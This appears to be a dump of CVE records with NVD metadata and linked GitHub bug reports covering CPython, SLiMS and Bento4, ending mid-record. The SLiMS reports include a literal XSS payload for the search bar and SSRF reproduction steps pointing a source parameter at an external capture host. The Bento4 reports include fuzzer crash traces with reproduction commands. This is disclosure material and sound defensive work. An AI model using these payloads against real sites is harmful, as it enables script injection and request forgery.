Security Response Team mailing list the conclusion was that we needed to limit the size of integer to string conversions for non-linear time conversions (anything not a power-of-2 base) by default. And offer the ability to configure or disable this limit. The Python Steering Council is aware of this change and accepts it as necessary. <!-- gh-linked-prs --> ### Linked PRs * gh-100627 * gh-100628 * gh-101065 * gh-101066 * gh-101630 * gh-101631 <!-- /gh-linked-prs -->
CVE-2020-10735: Prevent DoS by large int<->str conversions
https://api.github.com/repos/python/cpython/issues/95778/comments
24
2022-08-08T07:53:39Z
2023-02-07T04:35:46Z
https://github.com/python/cpython/issues/95778
1,331,477,062
95,778
CVE-2022-38291
2022-09-12T21:15:11.143
SLiMS Senayan Library Management System v9.4.2 was discovered to contain a cross-site scripting (XSS) vulnerability via the Search function. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Search bar.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/slims/slims9_bulian/issues/156" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:slims:senayan_library_management_system:9.4.2:*:*:*:*:*:*:*", "matchCriteriaId": "EDC3FA43-9AED-4115-B41B-61587D7D784F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/slims/slims9_bulian/issues/156
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "slims", "slims9_bulian" ]
**Describe the bug** XSS in search bar **To Reproduce** Steps to reproduce the behavior: 1. Go to the website and make sure it has more than 10 bibliography/books 2. put this payload (`<IMG SRC="jav&x09;ascript:alert('XSS');"><script>alert("xss by 0xdc9");</script>`) in the search bar and enter 3. an alert that said "xss_by_0xdc9" should pops **Screenshots** <img width="1440" alt="Screen Shot 2022-08-10 at 01 35 40" src="https://user-images.githubusercontent.com/46653986/183736842-e3d69a1c-8a89-4f27-88ac-c21f0a075b51.png"> <img width="1440" alt="Screen Shot 2022-08-10 at 02 23 15" src="https://user-images.githubusercontent.com/46653986/183744266-c064d591-63ce-487e-ac69-fb5300f81196.png"> **Desktop:** - OS: MacOS Mojave 10.14.6 - Browser: Google Chrome | 103.0.5060.134 (Official Build) (x86_64) - Slims Version: slims9_bulian-9.4.2
XSS in search bar
https://api.github.com/repos/slims/slims9_bulian/issues/156/comments
0
2022-08-09T18:44:51Z
2022-09-24T03:27:21Z
https://github.com/slims/slims9_bulian/issues/156
1,333,651,959
156
CVE-2022-38292
2022-09-12T21:15:11.193
SLiMS Senayan Library Management System v9.4.2 was discovered to contain multiple Server-Side Request Forgeries via the components /bibliography/marcsru.php and /bibliography/z3950sru.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/slims/slims9_bulian/issues/158" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:slims:senayan_library_management_system:9.4.2:*:*:*:*:*:*:*", "matchCriteriaId": "EDC3FA43-9AED-4115-B41B-61587D7D784F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/slims/slims9_bulian/issues/158
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "slims", "slims9_bulian" ]
**The bug** A Server Side Request Forgery exists in `admin/modules/bibliography/marcsru.php` and `admin/modules/bibliography/z3950sru.php` due to the class in `lib/marc/XMLParser.inc.php` **Reproduce** Steps to reproduce the behavior: 1. Go to `http://127.0.0.1:8008/slims9_bulian-9.4.2/admin/index.php?mod=bibliography` then go to copy cataloguing 2. choose between marc sru or 23950sru 3. type in something what you want in the search bar 4. set burpsuite intercept on 5. change the `z3950_SRU_source` or `marc_SRU_source` parameter value to some url that grab the traffic 6. forward the request 7. or just visit `http://127.0.0.1:8008/slims9_bulian-9.4.2/admin/modules/bibliography/marcsru.php?keywords=aaaaaaaa&index=0&marc_SRU_source=URL_ENCODED_ENDPOINT_THAT_CAPTURE_HTTP_LIKE_HOOKBIN` **Screenshots** Normal requests <img width="1435" alt="Screen Shot 2022-08-12 at 04 11 39" src="https://user-images.githubusercontent.com/46653986/184243053-ddf2bf58-051e-4c45-8873-c573c2ce7394.png"> Tampered and SSRF trigger(netcat) <img width="1438" alt="Screen Shot 2022-08-12 at 04 13 21" src="https://user-images.githubusercontent.com/46653986/184243621-ca8f82af-4a18-4abe-8ef4-c69e51c8a60d.png"> Tampered and SSRF trigger(toptal.com) <img width="1440" alt="Screen Shot 2022-08-12 at 04 22 25" src="https://user-images.githubusercontent.com/46653986/184244902-e9df9ed5-7c03-4c0b-bdf9-a58312c3cf67.png"> **Versions** - OS: MacOS Mojave 10.14.6 - Browser: Google Chrome | 103.0.5060.134 (Official Build) (x86_64) - Slims Version: slims9_bulian-9.4.2
[Security Bugs] Server Side Request Forgery
https://api.github.com/repos/slims/slims9_bulian/issues/158/comments
0
2022-08-11T21:31:20Z
2022-11-24T07:56:26Z
https://github.com/slims/slims9_bulian/issues/158
1,336,516,748
158
CVE-2022-40438
2022-09-14T21:15:10.627
Buffer overflow vulnerability in function AP4_MemoryByteStream::WritePartial in mp42aac in Bento4 v1.6.0-639, allows attackers to cause a denial of service via a crafted file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/751" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/751
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi, developers of Bento4: In the test of the binary mp42aac instrumented with ASAN. There are some inputs causing heap-buffer-overflow. Here is the ASAN mode output: ================================================================= ==4695==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6190000027a0 at pc 0x7ffff6ef6964 bp 0x7fffffffdea0 sp 0x7fffffffd648 WRITE of size 4294967288 at 0x6190000027a0 thread T0 #0 0x7ffff6ef6963 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c963) #1 0x409ed4 in AP4_MemoryByteStream::WritePartial(void const*, unsigned int, unsigned int&) /home/ferry/dp/Bento4/Source/C++/Core/Ap4ByteStream.cpp:785 #2 0x40d9e3 in AP4_ByteStream::Write(void const*, unsigned int) /home/ferry/dp/Bento4/Source/C++/Core/Ap4ByteStream.cpp:77 #3 0x4eb601 in AP4_Atom::Write(AP4_ByteStream&) /home/ferry/dp/Bento4/Source/C++/Core/Ap4Atom.cpp:229 #4 0x4eb601 in AP4_Atom::Clone() /home/ferry/dp/Bento4/Source/C++/Core/Ap4Atom.cpp:316 #5 0x446d7a in AP4_SampleDescription::AP4_SampleDescription(AP4_SampleDescription::Type, unsigned int, AP4_AtomParent*) /home/ferry/dp/Bento4/Source/C++/Core/Ap4SampleDescription.cpp:138 #6 0x461a8f in AP4_GenericAudioSampleDescription::AP4_GenericAudioSampleDescription(unsigned int, unsigned int, unsigned short, unsigned short, AP4_AtomParent*) /home/ferry/dp/Bento4/Source/C++/Core/Ap4SampleDescription.h:259 #7 0x461a8f in AP4_AudioSampleEntry::ToSampleDescription() /home/ferry/dp/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:630 #8 0x48ca03 in AP4_StsdAtom::GetSampleDescription(unsigned int) /home/ferry/dp/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:181 #9 0x4040b6 in main /home/ferry/dp/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:268 #10 0x7ffff61bb83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #11 0x408338 in _start (/home/ferry/dp/Bento4/mp42aac+0x408338) 0x6190000027a0 is located 0 bytes to the right of 1056-byte region [0x619000002380,0x6190000027a0) allocated by thread T0 here: #0 0x7ffff6f03712 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99712) #1 0x414c8e in AP4_DataBuffer::ReallocateBuffer(unsigned int) /home/ferry/dp/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:210 #2 0x414c8e in AP4_DataBuffer::SetBufferSize(unsigned int) /home/ferry/dp/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:136 #3 0x414c8e in AP4_DataBuffer::Reserve(unsigned int) /home/ferry/dp/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:107 SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memcpy Shadow bytes around the buggy address: 0x0c327fff84a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff84b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff84c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff84d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff84e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c327fff84f0: 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8520: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8530: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8540: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==4695==ABORTING ### Crash input https://github.com/17ssDP/fuzzer_crashes/blob/main/Bento4/input2 ### Validation steps ``` git clone https://github.com/axiomatic-systems/Bento4 cd Bento4/ mkdir check_build && cd check_build cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release make -j ./mp42aac input2 /dev/null ``` ### Environment Ubuntu 16.04 Clang 10.0.1 gcc 5.5
Heap-buffer-overflow with ASAN in mp42aac
https://api.github.com/repos/axiomatic-systems/Bento4/issues/751/comments
0
2022-09-07T02:21:29Z
2022-09-18T23:10:27Z
https://github.com/axiomatic-systems/Bento4/issues/751
1,364,000,633
751
CVE-2022-40439
2022-09-14T21:15:10.670
An memory leak issue was discovered in AP4_StdcFileByteStream::Create in mp42ts in Bento4 v1.6.0-639, allows attackers to cause a denial of service via a crafted file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/750" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/750
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi, developers of Bento4: In the test of the binary mp42ts instrumented with ASAN. There are some inputs causing memory leaks. Here is the ASAN mode output: ================================================================= ==18321==ERROR: LeakSanitizer: detected memory leaks Direct leak of 48 byte(s) in 1 object(s) allocated from: #0 0x7ffff6f03592 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99592) #1 0x4c871d in AP4_StdcFileByteStream::Create(AP4_FileByteStream*, char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/System/StdC/Ap4StdCFileByteStream.cpp:279 #2 0x4c871d in AP4_FileByteStream::Create(char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/System/StdC/Ap4StdCFileByteStream.cpp:439 Indirect leak of 72 byte(s) in 1 object(s) allocated from: #0 0x7ffff6f03592 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99592) #1 0x404286 in main /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:511 #2 0x7ffff61bb83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x7ffff6f03592 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99592) #1 0x4f57d1 in AP4_RtpAtom::Create(unsigned int, AP4_ByteStream&) /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/Core/Ap4RtpAtom.h:53 #2 0x4f57d1 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:689 Indirect leak of 24 byte(s) in 1 object(s) allocated from: #0 0x7ffff6f03592 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99592) #1 0x4d2591 in AP4_List<AP4_Atom>::Add(AP4_Atom*) /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/Core/Ap4List.h:160 #2 0x4d2591 in AP4_AtomParent::AddChild(AP4_Atom*, int) /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/Core/Ap4Atom.cpp:532 SUMMARY: AddressSanitizer: 208 byte(s) leaked in 4 allocation(s). ### **Crash Input** https://github.com/17ssDP/fuzzer_crashes/blob/main/Bento4/input1 ### Verification steps: ``` git clone https://github.com/axiomatic-systems/Bento4 cd Bento4/ mkdir check_build && cd check_build cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release make -j ./mp42ts input1 /dev/null ``` ### Environment Ubuntu 16.04 Clang 10.0.1 gcc 5.5
Memory leaks with ASAN in mp42ts
https://api.github.com/repos/axiomatic-systems/Bento4/issues/750/comments
0
2022-09-06T14:00:13Z
2023-05-29T02:53:17Z
https://github.com/axiomatic-systems/Bento4/issues/750
1,363,336,565
750
CVE-2022-40736
2022-09-15T04:15:24.510
An issue was discovered in Bento4 1.6.0-639. There ie excessive memory consumption in AP4_CttsAtom::Create in Core/Ap4CttsAtom.cpp.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/755" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/755
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
# summary Hello, I use my fuzzer to fuzz binary mp4tag mp4split and mp42hevc, the three binary all crashede, and shows that allocator is out of memory trying to allocate 0xxxxxxx bytes. The version of Bento4 is the latest and the operation system is Ubuntu 18.04(docker). The following is the details. # Bug1 ``` root@c511e4bf49bc:/mp42hevc/mp42hevc# ./mp42hevc seed.demo out.hevc ================================================================= ==92089==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x54ba37b78 bytes #0 0xa1b020 in malloc /llvm/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7fe65b2d6297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x6c1b9b in AP4_CttsAtom::Create(unsigned int, AP4_ByteStream&) (/mp42hevc/mp42hevc/mp42hevc+0x6c1b9b) #3 0x5cf24c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/mp42hevc/mp42hevc/mp42hevc+0x5cf24c) #4 0x5dcbb6 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/mp42hevc/mp42hevc/mp42hevc+0x5dcbb6) #5 0x6bd7a5 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/mp42hevc/mp42hevc/mp42hevc+0x6bd7a5) #6 0x6bc7f9 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/mp42hevc/mp42hevc/mp42hevc+0x6bc7f9) #7 0x5d5f65 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/mp42hevc/mp42hevc/mp42hevc+0x5d5f65) #8 0x5dcbb6 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/mp42hevc/mp42hevc/mp42hevc+0x5dcbb6) #9 0x6bd7a5 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/mp42hevc/mp42hevc/mp42hevc+0x6bd7a5) #10 0x6bcf4a in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/mp42hevc/mp42hevc/mp42hevc+0x6bcf4a) #11 0x5d5abc in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/mp42hevc/mp42hevc/mp42hevc+0x5d5abc) #12 0x5dcbb6 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/mp42hevc/mp42hevc/mp42hevc+0x5dcbb6) #13 0x6bd7a5 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/mp42hevc/mp42hevc/mp42hevc+0x6bd7a5) #14 0x6bfa61 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/mp42hevc/mp42hevc/mp42hevc+0x6bfa61) ==92089==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory /llvm/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 in malloc ==92089==ABORTING my test case: ``` # Bug2 ``` root@c511e4bf49bc:/mp42hevc/mp42hevc# /mp4box/mp4tag/mp4tag /mp4box/mp4tag/seed.demo ================================================================= ==843687==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x3a35b4320 bytes #0 0xa38ee0 in malloc /llvm/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f9f81086297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x4ae28b in AP4_CttsAtom::Create(unsigned int, AP4_ByteStream&) (/mp4box/mp4tag/mp4tag+0x4ae28b) #3 0x45f0fc in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/mp4box/mp4tag/mp4tag+0x45f0fc) #4 0x46ca96 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/mp4box/mp4tag/mp4tag+0x46ca96) #5 0x4a9e92 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/mp4box/mp4tag/mp4tag+0x4a9e92) #6 0x4ac151 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/mp4box/mp4tag/mp4tag+0x4ac151) ==843687==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory /llvm/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 in malloc ==843687==ABORTING ``` # Bug3 ``` root@c511e4bf49bc:/mp4split/mp4split# ./mp4split FishFuzz/crashes/id:000025,sig:06,src:000215,op:flip1,pos:31468,26038495 ================================================================= ==3151765==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x400000068 bytes #0 0xa19d40 in malloc /llvm/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f8d59cb9297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x48fc9b in AP4_CttsAtom::Create(unsigned int, AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x48fc9b) #3 0x440aec in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/mp4split/mp4split/mp4split+0x440aec) #4 0x44e46b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/mp4split/mp4split/mp4split+0x44e46b) #5 0x48b8a5 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/mp4split/mp4split/mp4split+0x48b8a5) #6 0x48b04a in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/mp4split/mp4split/mp4split+0x48b04a) #7 0x44735c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/mp4split/mp4split/mp4split+0x44735c) #8 0x44e46b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/mp4split/mp4split/mp4split+0x44e46b) #9 0x48b8a5 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/mp4split/mp4split/mp4split+0x48b8a5) #10 0x48b04a in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/mp4split/mp4split/mp4split+0x48b04a) #11 0x44735c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/mp4split/mp4split/mp4split+0x44735c) #12 0x44e46b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/mp4split/mp4split/mp4split+0x44e46b) #13 0x48b8a5 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/mp4split/mp4split/mp4split+0x48b8a5) #14 0x48b04a in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/mp4split/mp4split/mp4split+0x48b04a) #15 0x44735c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/mp4split/mp4split/mp4split+0x44735c) #16 0x44e46b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/mp4split/mp4split/mp4split+0x44e46b) #17 0x48b8a5 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/mp4split/mp4split/mp4split+0x48b8a5) #18 0x48db61 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/mp4split/mp4split/mp4split+0x48db61) ==3151765==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory /llvm/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 in malloc ==3151765==ABORTING ``` # POC [MP42hevc_crash.zip](https://github.com/axiomatic-systems/Bento4/files/9564409/MP42hevc_crash.zip) [MP4tag_crash.zip](https://github.com/axiomatic-systems/Bento4/files/9564445/MP4tag_crash.zip) [mp4split_crash.zip](https://github.com/axiomatic-systems/Bento4/files/9565667/mp4split_crash.zip) # Credit Yuhang Huang ([NCNIPC of China](http://www.nipc.org.cn/)),(Zhongguancun Laboratory) Han Zheng ([NCNIPC of China](http://www.nipc.org.cn/), [Hexhive](http://hexhive.epfl.ch/)),(Zhongguancun Laboratory) Thank you for your time!
Out of memory in AP4_CttsAtom::Create(unsigned int, AP4_ByteStream&)
https://api.github.com/repos/axiomatic-systems/Bento4/issues/755/comments
2
2022-09-14T08:47:21Z
2023-06-26T06:39:50Z
https://github.com/axiomatic-systems/Bento4/issues/755
1,372,600,841
755
CVE-2022-40737
2022-09-15T04:15:24.610
An issue was discovered in Bento4 through 1.6.0-639. A buffer over-read exists in the function AP4_StdcFileByteStream::WritePartial located in System/StdC/Ap4StdCFileByteStream.cpp, called from AP4_ByteStream::Write and AP4_HdlrAtom::WriteFields.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/756" } ]
